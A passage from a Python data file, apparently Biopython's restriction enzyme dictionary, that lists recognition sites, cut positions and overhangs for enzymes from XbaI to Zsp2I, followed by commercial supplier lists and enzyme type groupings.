'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['XbaI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TACGAG'),
'compsite': '(?=(?P<Xca85IV>TACGAG))|(?=(?P<Xca85IV_as>CTCGTA))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TACGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Xca85IV'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'RCATGY'),
'compsite': '(?=(?P<XceI>[AG]CATG[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RCATGY',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['XceI'] = _temp()
def _temp():
return {
'charac': (8, -8, None, None, 'CCANNNNNNNNNTGG'),
'compsite': '(?=(?P<XcmI>CCA.........TGG))',
'dna': None,
'freq': 4096.0,
'fst3': -8,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCANNNNNNNNNTGG',
'size': 15,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['XcmI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTCGAG'),
'compsite': '(?=(?P<XhoI>CTCGAG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TCGA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTCGAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'),
}
rest_dict['XhoI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'RGATCY'),
'compsite': '(?=(?P<XhoII>[AG]GATC[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGATCY',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['XhoII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCCGGG'),
'compsite': '(?=(?P<XmaI>CCCGGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCGGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N', 'R', 'V'),
}
rest_dict['XmaI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGGCCG'),
'compsite': '(?=(?P<XmaIII>CGGCCG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGCCG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['XmaIII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCTAGG'),
'compsite': '(?=(?P<XmaJI>CCTAGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTAGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['XmaJI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GTMKAC'),
'compsite': '(?=(?P<XmiI>GT[AC][GT]AC))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'MK',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTMKAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['XmiI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GAANNNNTTC'),
'compsite': '(?=(?P<XmnI>GAA....TTC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAANNNNTTC',
'size': 10,
'substrat': 'DNA',
'suppl': ('N', 'R'),
}
rest_dict['XmnI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTAG'),
'compsite': '(?=(?P<XspI>CTAG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTAG',
'size': 4,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['XspI'] = _temp()
def _temp():
return {
'charac': (11, 9, None, None, 'C'),
'compsite': '(?=(?P<YkrI>C))|(?=(?P<YkrI_as>G))',
'dna': None,
'freq': 4.0,
'fst3': 9,
'fst5': 11,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'C',
'size': 1,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['YkrI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GACGTC'),
'compsite': '(?=(?P<ZraI>GACGTC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACGTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N', 'V'),
}
rest_dict['ZraI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AGTACT'),
'compsite': '(?=(?P<ZrmI>AGTACT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGTACT',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['ZrmI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'ATGCAT'),
'compsite': '(?=(?P<Zsp2I>ATGCAT))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATGCAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Zsp2I'] = _temp()
suppliers = {}
def _temp():
return (
'Life Technologies',
['BshTI', 'MluI', 'HpaII', 'MreI', 'BclI', 'SacI', 'PauI', 'BglI', 'SalI', 'MspI', 'ScaI', 'Bsu15I', 'Mva1269I', 'Bsp68I', 'LweI', 'SmiI', 'PteI', 'Mph1103I', 'TscAI', 'NcoI', 'PsyI', 'BseJI', 'ClaI', 'MauBI', 'Eco24I', 'CseI', 'Eco47III', 'Eco91I', 'DraI', 'BseXI', 'BstXI', 'RruI', 'Esp3I', 'BseSI', 'Cfr9I', 'AarI', 'OliI', 'PvuI', 'BspOI', 'DpnI', 'Hin6I', 'LguI', 'Van91I', 'Bst1107I', 'Bme1390I', 'PacI', 'Psp5II', 'TaqI', 'Eco52I', 'GsuI', 'KpnI', 'SspDI', 'SsiI', 'RseI', 'MlsI', 'NdeI', 'HapII', 'Cfr13I', 'MboII', 'SdaI', 'BmsI', 'BglII', 'TasI', 'AjuI', 'AloI', 'FspBI', 'SchI', 'PfoI', 'Bpu10I', 'BshNI', 'SacII', 'Acc65I', 'BmeT110I', 'XapI', 'TaaI', 'PscI', 'Bsp1407I', 'NruI', 'MvaI', 'PasI', 'Hin1II', 'PaeI', 'Bsh1236I', 'MssI', 'CpoI', 'Eco130I', 'PspFI', 'TaiI', 'FspAI', 'BfmI', 'Eco47I', 'BoxI', 'RsaI', 'HincII', 'HpyF10VI', 'XbaI', 'Lsp1109I', 'AjiI', 'Bsp119I', 'MboI', 'AluI', 'SduI', 'SgsI', 'BseGI', 'Eco72I', 'BcnI', 'SgeI', 'EcoRII', 'Alw21I', 'XagI', 'Hpy8I', 'PsuI', 'SmaI', 'NheI', 'BplI', 'Ppu21I', 'SmoI', 'FaqI', 'AdeI', 'StuI', 'BcuI', 'BspTI', 'SpeI', 'SphI', 'BseLI', 'AasI', 'PvuII', 'EheI', 'BveI', 'FokI', 'Hin1I', 'Alw26I', 'Cfr10I', 'SgrDI', 'Eco31I', 'HinfI', 'Eam1105I', 'BsuRI', 'Eam1104I', 'Ecl136II', 'XmaJI', 'SfaAI', 'HphI', 'Psp1406I', 'Csp6I', 'EcoO109I', 'BseMII', 'HindIII', 'EcoRV', 'AatII', 'BfuI', 'EcoRI', 'XmiI', 'TauI', 'XhoI', 'Bsp143I', 'BspPI', 'MnlI', 'PfeI', 'CaiI', 'Bpu1102I', 'MunI', 'Tru1I', 'BspLI', 'Eco105I', 'NsbI', 'PstI', 'VspI', 'Alw44I', 'SfiI', 'BpiI', 'XceI', 'BseMI', 'HaeIII', 'Kpn2I', 'Cfr42I', 'SatI', 'AccI', 'SspI', 'Eco32I', 'KflI', 'BseDI', 'KspAI', 'Eco81I', 'BauI', 'AanI', 'ApaI', 'SaqAI', 'EcoT22I', 'Eco88I', 'Eco57I', 'Eco147I', 'PdmI', 'BalI', 'CsiI', 'AfaI', 'Bsp120I', 'NotI', 'MbiI', 'BamHI', 'BfoI', 'TatI', 'HpaI', 'HpyF3I', 'Pfl23II', 'Bsh1285I', 'HhaI', 'NmuCI', 'BseNI', 'PagI', 'PdiI'],
)
suppliers['B'] = _temp()
def _temp():
return (
'Minotech Biotechnology',
['SgrBI', 'BclI', 'BglI', 'SalI', 'PspPI', 'ScaI', 'SnaBI', 'BstEII', 'NcoI', 'BshFI', 'AsuII', 'BssAI', 'BseAI', 'TaqI', 'KpnI', 'BglII', 'NaeI', 'BseBI', 'NruI', 'RsaI', 'BsiSI', 'XbaI', 'MboI', 'AluI', 'SlaI', 'SseBI', 'SmaI', 'NheI', 'SstI', 'Sau3AI', 'SphI', 'PvuII', 'ApaLI', 'HinfI', 'MspCI', 'HindIII', 'EcoRV', 'EcoRI', 'BseCI', 'PstI', 'SfiI', 'SspI', 'CspAI', 'NotI', 'BamHI', 'HpaI', 'StyI'],
)
suppliers['C'] = _temp()
def _temp():
return (
'Agilent Technologies',
['DpnI'],
)
suppliers['E'] = _temp()
def _temp():
return (
'SibEnzyme Ltd.',
['AsuNHI', 'AgsI', 'MluI', 'CciI', 'BstHHI', 'HpaII', 'AhlI', 'KroI', 'PspN4I', 'BglI', 'SalI', 'PspEI', 'MspI', 'VneI', 'BstH2I', 'BisI', 'BmtI', 'PspXI', 'AsiGI', 'CciNI', 'Sfr274I', 'SmiI', 'Ksp22I', 'BstSFI', 'BssT1I', 'PciSI', 'Bsp19I', 'Bse1I', 'AspS9I', 'AbsI', 'FauNDI', 'LmnI', 'AclWI', 'DraI', 'Bst2UI', 'AluBI', 'PsrI', 'BstACI', 'BstXI', 'BstDEI', 'GluI', 'AcoI', 'XmaI', 'BstF5I', 'BstMBI', 'BstENI', 'BssECI', 'FalI', 'EgeI', 'Ama87I', 'BstDSI', 'BstV2I', 'AjnI', 'AspLEI', 'PalAI', 'Zsp2I', 'DseDI', 'BstAUI', 'Bpu14I', 'FaeI', 'TaqI', 'KpnI', 'BstSNI', 'AclI', 'MboII', 'BglII', 'PspPPI', 'SetI', 'AcsI', 'BstNSI', 'BseX3I', 'RsaNI', 'Bpu10I', 'Rsr2I', 'Acc65I', 'Bst2BI', 'NruI', 'Ple19I', 'TseFI', 'SspMI', 'PciI', 'MalI', 'Bse118I', 'BsuI', 'BsePI', 'BstMCI', 'Bme18I', 'RsaI', 'BssNAI', 'BstV1I', 'Bsp13I', 'Bst4CI', 'MabI', 'AsuHPI', 'BtrI', 'XbaI', 'ArsI', 'BstC8I', 'Psp124BI', 'GlaI', 'HgaI', 'BstX2I', 'AluI', 'ZraI', 'Bse21I', 'Sfr303I', 'BstSCI', 'Bse3DI', 'Bso31I', 'AccB7I', 'BstKTI', 'AccBSI', 'SmaI', 'SmiMI', 'BspACI', 'AspA2I', 'Bsp1720I', 'Bsc4I', 'SphI', 'Mly113I', 'FriOI', 'PvuII', 'MfeI', 'ErhI', 'FokI', 'AsuC2I', 'GsaI', 'HinfI', 'MroNI', 'BsuRI', 'PpsI', 'BstPAI', 'PsiI', 'HspAI', 'RgaI', 'MspA1I', 'Fsp4HI', 'Kzo9I', 'Acc36I', 'DraIII', 'Acc16I', 'MspR9I', 'HindIII', 'Tth111I', 'EcoRV', 'AatII', 'MroXI', 'EcoRI', 'ZrmI', 'BstFNI', 'BslFI', 'Bsa29I', 'MnlI', 'SbfI', 'PstI', 'Bse8I', 'FauI', 'VspI', 'SfiI', 'Bst6I', 'BspFNI', 'Bbv12I', 'HaeIII', 'BstAPI', 'SspI', 'AfeI', 'PspOMI', 'BstMAI', 'BstSLI', 'ApaI', 'BlsI', 'Mox20I', 'FblI', 'BmuI', 'PcsI', 'BstMWI', 'BarI', 'PctI', 'FaiI', 'BpmI', 'PstNI', 'AcuI', 'AccB1I', 'PceI', 'PkrI', 'HpySE526I', 'Sse9I', 'Tru9I', 'MhlI', 'BstBAI', 'MteI', 'DriI', 'AoxI', 'EcoICRI', 'FatI', 'BamHI', 'Psp6I', 'BstAFI', 'SfaNI', 'RigI', 'HpaI', 'PspCI', 'HindII', 'PspLI', 'AsiSI'],
)
suppliers['I'] = _temp()
def _temp():
return (
'Nippon Gene Co., Ltd.',
['BssHII', 'AxyI', 'MluI', 'BclI', 'SacI', 'EcoT38I', 'BglI', 'SalI', 'MspI', 'ScaI', 'BstEII', 'NcoI', 'AgeI', 'DraI', 'BstXI', 'SwaI', 'AvaI', 'TaqI', 'AseI', 'KpnI', 'Sau96I', 'HaeII', 'NdeI', 'MboII', 'AflII', 'BglII', 'AccII', 'SacII', 'NruI', 'NarI', 'RsaI', 'HincII', 'XbaI', 'AluI', 'ScrFI', 'EcoRII', 'SmaI', 'NheI', 'StuI', 'Sau3AI', 'SpeI', 'SphI', 'FspI', 'PvuII', 'FokI', 'HinfI', 'NciI', 'EcoO109I', 'HindIII', 'EcoRV', 'EcoRI', 'XhoI', 'Bsp1286I', 'AccIII', 'PstI', 'BsmI', 'Alw44I', 'SfiI', 'HaeIII', 'NdeII', 'AccI', 'SspI', 'NsiI', 'ApaI', 'NspV', 'BalI', 'NotI', 'AcyI', 'BamHI', 'AvaII', 'HpaI', 'StyI', 'HhaI'],
)
suppliers['J'] = _temp()
def _temp():
return (
'Takara Bio Inc.',
['BssHII', 'PshBI', 'MluI', 'BspT107I', 'SacI', 'XspI', 'BglI', 'SalI', 'MspI', 'BstPI', 'ScaI', 'BanII', 'PmaCI', 'SnaBI', 'SmiI', 'BmgT120I', 'NcoI', 'ClaI', 'DraI', 'BstXI', 'PshAI', 'PvuI', 'DpnI', 'Van91I', 'Bst1107I', 'TaqI', 'EaeI', 'Eco52I', 'BspT104I', 'KpnI', 'HaeII', 'EcoO65I', 'NdeI', 'HapII', 'MboII', 'AflII', 'EcoT14I', 'BglII', 'NaeI', 'AccII', 'SacII', 'BmeT110I', 'Aor51HI', 'Bsp1407I', 'NruI', 'Sse8387I', 'CpoI', 'HincII', 'XbaI', 'MboI', 'AluI', 'BcnI', 'SmaI', 'NheI', 'StuI', 'Sau3AI', 'SpeI', 'SphI', 'PvuII', 'MflI', 'FokI', 'Hin1I', 'ApaLI', 'Cfr10I', 'HinfI', 'Psp1406I', 'EcoO109I', 'HindIII', 'Tth111I', 'EcoRV', 'AatII', 'EcoRI', 'XhoI', 'VpaK11BI', 'Bsp1286I', 'AccIII', 'Bpu1102I', 'MunI', 'Aor13HI', 'PstI', 'SfiI', 'BlnI', 'HaeIII', 'BciT130I', 'AccI', 'SspI', 'FbaI', 'Eco81I', 'ApaI', 'EcoT22I', 'BalI', 'DdeI', 'AfaI', 'NotI', 'BamHI', 'HpaI', 'HhaI'],
)
suppliers['K'] = _temp()
def _temp():
return (
'Roche Applied Science',
['BssHII', 'MluI', 'BclI', 'SacI', 'SalI', 'Asp718I', 'ScaI', 'SnaBI', 'NcoI', 'ClaI', 'Eco47III', 'DraI', 'BstXI', 'SwaI', 'PvuI', 'DpnI', 'BbrPI', 'TaqI', 'SexAI', 'KpnI', 'NdeI', 'BglII', 'MaeI', 'NruI', 'MvaI', 'NarI', 'RsaI', 'MaeII', 'AflIII', 'XbaI', 'MvnI', 'AluI', 'CfoI', 'SmaI', 'NheI', 'StuI', 'Sau3AI', 'SpeI', 'SphI', 'MaeIII', 'PvuII', 'FokI', 'HinfI', 'DraIII', 'MluNI', 'HindIII', 'EcoRV', 'AatII', 'EcoRI', 'XhoI', 'MunI', 'PstI', 'BsmI', 'SfiI', 'BlnI', 'HaeIII', 'NdeII', 'AccI', 'NsiI', 'ApaI', 'SfuI', 'BfrI', 'KspI', 'Tru9I', 'DdeI', 'NotI', 'MroI', 'Asp700I', 'BamHI', 'HpaI', 'HindII'],
)
suppliers['M'] = _temp()
def _temp():
return (
'New England Biolabs',
['BssHII', 'EciI', 'BsrFI', 'DpnII', 'AlwI', 'MluI', 'AlwNI', 'NgoMIV', 'HpaII', 'TspMI', 'BclI', 'MlyI', 'BsaWI', 'SacI', 'MwoI', 'BfaI', 'DrdI', 'BmgBI', 'BglI', 'SalI', 'MspI', 'ScaI', 'BanII', 'MslI', 'BmtI', 'PspXI', 'BsaBI', 'SnaBI', 'BstEII', 'NcoI', 'BtgI', 'ClaI', 'BsaI', 'BsrBI', 'AgeI', 'XmnI', 'DraI', 'Hpy166II', 'Hpy99I', 'StyD4I', 'BstXI', 'PspGI', 'BsiHKAI', 'PpuMI', 'BsoBI', 'BlpI', 'Esp3I', 'PshAI', 'XmaI', 'BtsIMutI', 'SwaI', 'AvaI', 'PvuI', 'DpnI', 'CspCI', 'PflFI', 'BpuEI', 'PacI', 'TaqI', 'EaeI', 'SexAI', 'BsrI', 'AseI', 'KpnI', 'Sau96I', 'BstNI', 'HaeII', 'AclI', 'ApoI', 'HpyCH4IV', 'NdeI', 'MboII', 'AflII', 'TseI', 'BglII', 'SmlI', 'NaeI', 'Bpu10I', 'SacII', 'Acc65I', 'BspQI', 'MseI', 'AvrII', 'NruI', 'BaeI', 'BtsCI', 'PciI', 'BcgI', 'BsaHI', 'SfoI', 'MspJI', 'NarI', 'Bsu36I', 'RsaI', 'HincII', 'AflIII', 'BspCNI', 'BsgI', 'XbaI', 'AbaSI', 'BfuAI', 'TfiI', 'PmlI', 'BbvI', 'MboI', 'HgaI', 'BanI', 'AluI', 'BaeGI', 'ZraI', 'Hpy188III', 'RsrII', 'BspMI', 'MluCI', 'AciI', 'ScrFI', 'MscI', 'BseYI', 'CviQI', 'BmrI', 'Hpy188I', 'SmaI', 'PleI', 'EcoNI', 'NheI', 'BccI', 'FspEI', 'BsiEI', 'StuI', 'Sau3AI', 'BcoDI', 'SpeI', 'BsiWI', 'SphI', 'HpyAV', 'FspI', 'CviAII', 'PvuII', 'Eco53kI', 'MfeI', 'BsrDI', 'BssSI', 'TspRI', 'FokI', 'ApaLI', 'ApeKI', 'HinfI', 'BciVI', 'HinP1I', 'NciI', 'PsiI', 'BceAI', 'HphI', 'MspA1I', 'BsmAI', 'DraIII', 'EcoO109I', 'HindIII', 'BtsI', 'SapI', 'Tth111I', 'EcoRV', 'AatII', 'EcoRI', 'BsmFI', 'XhoI', 'Bsp1286I', 'PluTI', 'MnlI', 'EagI', 'AscI', 'AhdI', 'NlaIII', 'SbfI', 'PstI', 'FauI', 'SfcI', 'BspEI', 'BsmI', 'SfiI', 'BstUI', 'BstZ17I', 'KasI', 'HaeIII', 'BsmBI', 'XcmI', 'LpnPI', 'BstAPI', 'AccI', 'SspI', 'HpyCH4III', 'BsrGI', 'AfeI', 'SrfI', 'SgrAI', 'NsiI', 'BspHI', 'BstYI', 'PspOMI', 'PmeI', 'FseI', 'ApaI', 'BseRI', 'MmeI', 'BtgZI', 'BpmI', 'EarI', 'CviKI_1', 'AcuI', 'NspI', 'BstBI', 'HpyCH4V', 'NlaIV', 'BbsI', 'DdeI', 'NotI', 'BsaXI', 'FatI', 'BamHI', 'BslI', 'AvaII', 'BspDI', 'PaeR7I', 'SfaNI', 'HpaI', 'BsaJI', 'BbvCI', 
'Fnu4HI', 'Cac8I', 'Tsp45I', 'StyI', 'PflMI', 'HhaI', 'AsiSI', 'AleI', 'NmeAIII', 'BsaAI'],
)
suppliers['N'] = _temp()
def _temp():
return (
'Toyobo Biochemicals',
['MluI', 'BclI', 'SacI', 'BglI', 'SalI', 'ScaI', 'NcoI', 'PvuI', 'DpnI', 'PacI', 'KpnI', 'BglII', 'SacII', 'HincII', 'AluI', 'MscI', 'SmaI', 'NheI', 'SpeI', 'SphI', 'PvuII', 'HinfI', 'HindIII', 'EcoRV', 'EcoRI', 'XhoI', 'PstI', 'SfiI', 'HaeIII', 'DdeI', 'NotI', 'MroI', 'BamHI'],
)
suppliers['O'] = _temp()
def _temp():
return (
'Molecular Biology Resources - CHIMERx',
['BssHII', 'MluI', 'HpaII', 'SacI', 'BglI', 'SalI', 'MspI', 'ScaI', 'NcoI', 'ClaI', 'CviJI', 'DraI', 'BstXI', 'AcvI', 'AvaI', 'PvuI', 'DpnI', 'TaqI', 'KpnI', 'NdeI', 'MboII', 'BglII', 'SacII', 'NruI', 'NarI', 'TaqII', 'RsaI', 'HincII', 'XbaI', 'TspGWI', 'MboI', 'AluI', 'RsrII', 'SmaI', 'NheI', 'StuI', 'SpeI', 'SphI', 'PvuII', 'HinfI', 'BsiHKCI', 'HindIII', 'Tth111I', 'EcoRV', 'EcoRI', 'XhoI', 'MnlI', 'PinAI', 'PstI', 'SfiI', 'HaeIII', 'AccI', 'SspI', 'NsiI', 'ApaI', 'TspDTI', 'BalI', 'DdeI', 'NotI', 'BamHI', 'HpaI', 'HhaI'],
)
suppliers['Q'] = _temp()
def _temp():
return (
'Promega Corporation',
['BssHII', 'MluI', 'HpaII', 'BclI', 'SacI', 'BglI', 'SalI', 'MspI', 'ScaI', 'SnaBI', 'BstEII', 'NcoI', 'ClaI', 'AgeI', 'XmnI', 'Eco47III', 'DraI', 'BstXI', 'XmaI', 'PvuI', 'DpnI', 'TaqI', 'KpnI', 'HaeII', 'NdeI', 'MboII', 'BglII', 'SacII', 'NruI', 'CspI', 'NarI', 'RsaI', 'Hsp92II', 'HincII', 'XbaI', 'MboI', 'BanI', 'AluI', 'CfoI', 'SmaI', 'NheI', 'StuI', 'Sau3AI', 'SpeI', 'SphI', 'PvuII', 'HinfI', 'NciI', 'MspA1I', 'HindIII', 'SgfI', 'EcoRV', 'EcoRI', 'XhoI', 'AccIII', 'PstI', 'VspI', 'BstZI', 'SfiI', 'Hsp92I', 'HaeIII', 'AccI', 'SspI', 'NsiI', 'ApaI', 'BalI', 'Tru9I', 'DdeI', 'NotI', 'EcoICRI', 'BamHI', 'AvaII', 'HpaI', 'HhaI'],
)
suppliers['R'] = _temp()
def _temp():
return (
'Sigma Chemical Corporation',
['MluI', 'BclI', 'SacI', 'SalI', 'Asp718I', 'ScaI', 'NcoI', 'ClaI', 'Eco47III', 'DraI', 'SwaI', 'PvuI', 'DpnI', 'TaqI', 'KpnI', 'NdeI', 'BglII', 'NruI', 'RsaI', 'AflIII', 'XbaI', 'AluI', 'CfoI', 'SmaI', 'NheI', 'StuI', 'SpeI', 'SphI', 'MaeIII', 'PvuII', 'HindIII', 'EcoRV', 'EcoRI', 'XhoI', 'MunI', 'EclXI', 'PstI', 'BsmI', 'SfiI', 'BlnI', 'HaeIII', 'NsiI', 'ApaI', 'SfuI', 'BfrI', 'KspI', 'DdeI', 'NotI', 'BamHI', 'HpaI', 'HindII'],
)
suppliers['S'] = _temp()
def _temp():
return (
'Vivantis Technologies',
['BssMI', 'AsuNHI', 'MluI', 'BstHHI', 'HpaII', 'AhlI', 'BglI', 'SalI', 'PspEI', 'MspI', 'VneI', 'BstH2I', 'BmtI', 'AsiGI', 'CciNI', 'Sfr274I', 'SmiI', 'Ksp22I', 'BssT1I', 'Bsp19I', 'Bse1I', 'AspS9I', 'BmcAI', 'FauNDI', 'DraI', 'Bst2UI', 'Vha464I', 'BstXI', 'BstDEI', 'XmaI', 'BstF5I', 'BstMBI', 'BstENI', 'Ama87I', 'BstDSI', 'BstV2I', 'AspLEI', 'Zsp2I', 'DseDI', 'BstAUI', 'Bpu14I', 'TaqI', 'KpnI', 'BstSNI', 'AclI', 'MboII', 'BmrFI', 'BglII', 'AcsI', 'BstNSI', 'BmeRI', 'BseX3I', 'Bpu10I', 'Rsr2I', 'Acc65I', 'BtuMI', 'Bse118I', 'BsnI', 'BmiI', 'BsePI', 'BstMCI', 'Bme18I', 'RsaI', 'BssNAI', 'Bsp13I', 'Bst4CI', 'AsuHPI', 'XbaI', 'Psp124BI', 'BstX2I', 'AluI', 'ZraI', 'Bse21I', 'Sfr303I', 'BpuMI', 'Bse3DI', 'Bso31I', 'AccB7I', 'AccBSI', 'SmaI', 'SmiMI', 'AspA2I', 'Bsp1720I', 'SphI', 'FriOI', 'PvuII', 'BshVI', 'FokI', 'HinfI', 'MroNI', 'BstPAI', 'HspAI', 'MspA1I', 'DraIII', 'Acc16I', 'HindIII', 'Tth111I', 'EcoRV', 'AatII', 'MroXI', 'EcoRI', 'DinI', 'BstFNI', 'AfiI', 'MnlI', 'SbfI', 'PstI', 'Bse8I', 'VspI', 'SfiI', 'Bst6I', 'Msp20I', 'Bbv12I', 'SspI', 'PspOMI', 'BstMAI', 'ApaI', 'FblI', 'PctI', 'AccB1I', 'BssNI', 'PceI', 'Sse9I', 'Tru9I', 'MhlI', 'BstBAI', 'EcoICRI', 'BamHI', 'SfaNI', 'HpaI', 'PspCI', 'HindII'],
)
suppliers['V'] = _temp()
def _temp():
return (
'EURx Ltd.',
['BssHII', 'MluI', 'HpaII', 'BspTNI', 'SacI', 'BglI', 'SalI', 'MspI', 'ScaI', 'BanII', 'NcoI', 'ClaI', 'CviJI', 'DraI', 'BstXI', 'AcvI', 'AvaI', 'PvuI', 'DpnI', 'TaqI', 'SinI', 'KpnI', 'NdeI', 'MboII', 'BglII', 'SacII', 'NruI', 'NarI', 'TaqII', 'RsaI', 'HincII', 'XbaI', 'BspANI', 'TspGWI', 'MboI', 'AluI', 'RsrII', 'SmaI', 'NheI', 'StuI', 'Sau3AI', 'SpeI', 'SphI', 'PvuII', 'FokI', 'HinfI', 'BsiHKCI', 'HindIII', 'Tth111I', 'EcoRV', 'EcoRI', 'XhoI', 'MnlI', 'PinAI', 'PstI', 'BspMAI', 'SfiI', 'HaeIII', 'AccI', 'SspI', 'NsiI', 'ApaI', 'MmeI', 'TspDTI', 'BalI', 'DdeI', 'NotI', 'BamHI', 'BsuTUI', 'AvaII', 'HpaI', 'HhaI'],
)
suppliers['X'] = _temp()
def _temp():
return (
'SinaClon BioScience Co.',
['NcoI', 'BstXI', 'KpnI', 'RsaI', 'BsiSI', 'MboI', 'AluI', 'SlaI', 'SmaI', 'FokI', 'HinfI', 'HindIII', 'EcoRI', 'BamHI'],
)
suppliers['Y'] = _temp()
typedict = {}
def _temp():
return (
('Palindromic', 'TwoCuts', 'Ov5', 'Ambiguous', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['NmeDI'],
)
typedict['type130'] = _temp()
def _temp():
return (
('Palindromic', 'TwoCuts', 'Ov5', 'Ambiguous', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['UcoMSI'],
)
typedict['type132'] = _temp()
def _temp():
return (
('Palindromic', 'TwoCuts', 'Ov3', 'Ambiguous', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['RdeGBIII'],
)
typedict['type142'] = _temp()
def _temp():
return (
('Palindromic', 'TwoCuts', 'Ov3', 'Ambiguous', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['FalI', 'BplI'],
)
typedict['type143'] = _temp()
def _temp():
return (
('Palindromic', 'TwoCuts', 'Ov3', 'Ambiguous', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['BdaI', 'AlfI'],
)
typedict['type144'] = _temp()
def _temp():
return (
('NonPalindromic', 'NoCut', 'Unknown', 'NotDefined', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
